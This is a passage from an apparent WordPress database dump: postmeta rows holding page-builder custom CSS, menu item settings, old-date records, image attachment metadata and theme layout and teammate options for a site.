!important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37127,5457,'_wpb_shortcodes_custom_css_updated','1'),
(37128,5458,'_wpb_post_custom_layout','default'),
(37129,5458,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37130,5458,'_wpb_shortcodes_custom_css_updated','1'),
(37131,5460,'_menu_item_type','custom'),
(37132,5460,'_menu_item_menu_item_parent','0'),
(37133,5460,'_menu_item_object_id','5460'),
(37134,5460,'_menu_item_object','custom'),
(37135,5460,'_menu_item_target','_blank'),
(37136,5460,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(37137,5460,'_menu_item_xfn',''),
(37138,5460,'_menu_item_url','#'),
(37140,2082,'_wp_old_date','2023-09-01'),
(37141,2083,'_wp_old_date','2023-09-01'),
(37142,2346,'_wp_old_date','2023-09-01'),
(37143,2348,'_wp_old_date','2023-09-01'),
(37144,2349,'_wp_old_date','2023-09-01'),
(37145,2350,'_wp_old_date','2023-09-01'),
(37146,2351,'_wp_old_date','2023-09-01'),
(37147,2904,'_wp_old_date','2023-09-01'),
(37148,3556,'_wp_old_date','2023-09-01'),
(37149,4852,'_wp_old_date','2023-09-01'),
(37150,2084,'_wp_old_date','2023-09-01'),
(37151,2352,'_wp_old_date','2023-09-01'),
(37152,5448,'_wp_old_date','2023-09-01'),
(37153,5117,'_wp_old_date','2023-09-01'),
(37154,5118,'_wp_old_date','2023-09-01'),
(37155,3671,'_wp_old_date','2023-09-01'),
(37156,5119,'_wp_old_date','2023-09-01'),
(37157,5120,'_wp_old_date','2023-09-01'),
(37158,2281,'_wp_old_date','2023-09-01'),
(37159,2353,'_wp_old_date','2023-09-01'),
(37160,2354,'_wp_old_date','2023-09-01'),
(37161,2355,'_wp_old_date','2023-09-01'),
(37162,2282,'_wp_old_date','2023-09-01'),
(37163,2283,'_wp_old_date','2023-09-01'),
(37164,3645,'_wp_old_date','2023-09-01'),
(37165,2284,'_wp_old_date','2023-09-01'),
(37166,2921,'_wp_old_date','2023-09-01'),
(37167,2285,'_wp_old_date','2023-09-01'),
(37168,5402,'_wp_old_date','2023-09-01'),
(37169,5437,'_wp_old_date','2023-09-01'),
(37170,2356,'_wp_old_date','2023-09-01'),
(37171,2357,'_wp_old_date','2023-09-01'),
(37172,2359,'_wp_old_date','2023-09-01'),
(37173,2358,'_wp_old_date','2023-09-01'),
(37174,2286,'_wp_old_date','2023-09-01'),
(37175,5461,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(37176,5461,'_wpb_shortcodes_custom_css_updated','1'),
(37177,5462,'_wp_attached_file','2023/09/IMG-20230905-WA0015.jpg'),
(37178,5462,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:315;s:6:\"height\";i:472;s:4:\"file\";s:31:\"2023/09/IMG-20230905-WA0015.jpg\";s:8:\"filesize\";i:14311;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"IMG-20230905-WA0015-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10823;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"IMG-20230905-WA0015-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5395;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(37179,5462,'fb_filesize','14311'),
(37180,5463,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(37181,5463,'_wpb_shortcodes_custom_css_updated','1'),
(37182,5464,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(37183,5464,'_wpb_shortcodes_custom_css_updated','1'),
(37184,5465,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(37185,5465,'_wpb_shortcodes_custom_css_updated','1'),
(37186,5466,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(37187,5466,'_wpb_shortcodes_custom_css_updated','1'),
(37188,5468,'_edit_lock','1694431130:1'),
(37189,5470,'_wp_attached_file','2023/09/nasr.jpg'),
(37190,5470,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:130;s:6:\"height\";i:160;s:4:\"file\";s:16:\"2023/09/nasr.jpg\";s:8:\"filesize\";i:47095;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"nasr-130x150.jpg\";s:5:\"width\";i:130;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7774;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(37191,5470,'fb_filesize','47095'),
(37192,5468,'_edit_last','1'),
(37193,5468,'_wpb_vc_js_status','false'),
(37194,5468,'_dt_sidebar_position','right'),
(37195,5468,'_dt_sidebar_widgetarea_id','sidebar_1'),
(37196,5468,'_dt_sidebar_hide_on_mobile','0'),
(37197,5468,'_dt_footer_show','1'),
(37198,5468,'_dt_footer_widgetarea_id','sidebar_2'),
(37199,5468,'_dt_footer_hide_on_mobile','0'),
(37200,5468,'_dt_header_title','fancy'),
(37201,5468,'_dt_header_background','normal'),
(37202,5468,'_dt_header_background_below_slideshow','disabled'),
(37203,5468,'_dt_header_transparent_bg_color_scheme','light'),
(37204,5468,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(37205,5468,'_dt_header_transparent_top_bar_bg_opacity','25'),
(37206,5468,'_dt_header_transparent_bg_color','#000000'),
(37207,5468,'_dt_header_transparent_bg_opacity','50'),
(37208,5468,'_dt_header_disabled_background','normal'),
(37209,5468,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(37210,5468,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(37211,5468,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(37212,5468,'_dt_header_disabled_transparent_bg_color','#000000'),
(37213,5468,'_dt_header_disabled_transparent_bg_opacity','50'),
(37214,5468,'_dt_page_overrides_top_margin',''),
(37215,5468,'_dt_page_overrides_right_margin',''),
(37216,5468,'_dt_page_overrides_bottom_margin',''),
(37217,5468,'_dt_page_overrides_left_margin',''),
(37218,5468,'_dt_mobile_page_padding_top',''),
(37219,5468,'_dt_mobile_page_padding_right',''),
(37220,5468,'_dt_mobile_page_padding_bottom',''),
(37221,5468,'_dt_mobile_page_padding_left',''),
(37222,5468,'_dt_teammate_options_go_to_single','1'),
(37223,5468,'_dt_teammate_options_position',''),
(37224,5468,'_dt_teammate_options_website',''),
(37225,5468,'_dt_teammate_options_mail',''),
(37226,5468,'_dt_teammate_options_facebook',''),
(37227,5468,'_dt_teammate_options_twitter',''),
(37228,5468,'_dt_teammate_options_dribbble',''),
(37229,5468,'_dt_teammate_options_you-tube',''),
(37230,5468,'_dt_teammate_options_rss',''),
(37231,5468,'_dt_teammate_options_delicious',''),
(37232,5468,'_dt_teammate_options_flickr',''),
(37233,5468,'_dt_teammate_options_lastfm',''),
